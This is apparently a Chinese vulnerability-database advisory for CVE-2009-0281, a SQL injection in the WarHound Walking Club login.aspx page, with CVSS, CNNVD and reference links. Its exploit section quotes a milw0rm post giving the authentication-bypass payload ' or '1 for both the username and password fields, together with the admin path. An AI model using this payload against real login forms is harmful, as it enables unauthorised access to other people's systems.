WarHound Walking Club 'login.aspx' SQL注入漏洞

漏洞ID	1117253	漏洞类型	SQL注入
发布时间	2009-01-16	更新时间	2009-01-27
CVE编号	CVE-2009-0281	CNNVD-ID	CNNVD-200901-357
漏洞平台	ASP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/7802
https://cxsecurity.com/issue/WLB-2009010215
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-357

|漏洞详情

WarHoundWalkingClub中的login.aspx存在SQL注入漏洞。远程攻击者可以借助用户名和密码参数，执行任意的SQL指令。

|漏洞EXP

#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]The Walking Club (Auth Bypass)

[~]Script        : The Walking Club

[~]Price         : $39   :) 

[~]Demo          : http://warhound.com/ASP/walking/login.aspx

[~]Details       : http://warhound.com/asp/products.htm
#############################################
[~]Admin     :  [PATH] /walking/login.aspx

[~]username  : ' or '1

[~]password  : ' or '1
#############################################
[~]Ä°ÅŸinize BaqÄ±n :=)

[~]Greetz For C4TEAM Members
#############################################
Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M...
Onun derdini gÃ¶rdÃ¼m, derdime Ä°MRENDÄ°M...
----------
FilistiN

# milw0rm.com [2009-01-16]

|参考资料

来源:XF
名称:walkingclub-login-sql-injection(48061)
链接:http://xforce.iss.net/xforce/xfdb/48061
来源:BID
名称:33317
链接:http://www.securityfocus.com/bid/33317
来源:MILW0RM
名称:7802
链接:http://www.milw0rm.com/exploits/7802

WarHound Walking Club 'login.aspx' SQL注入漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞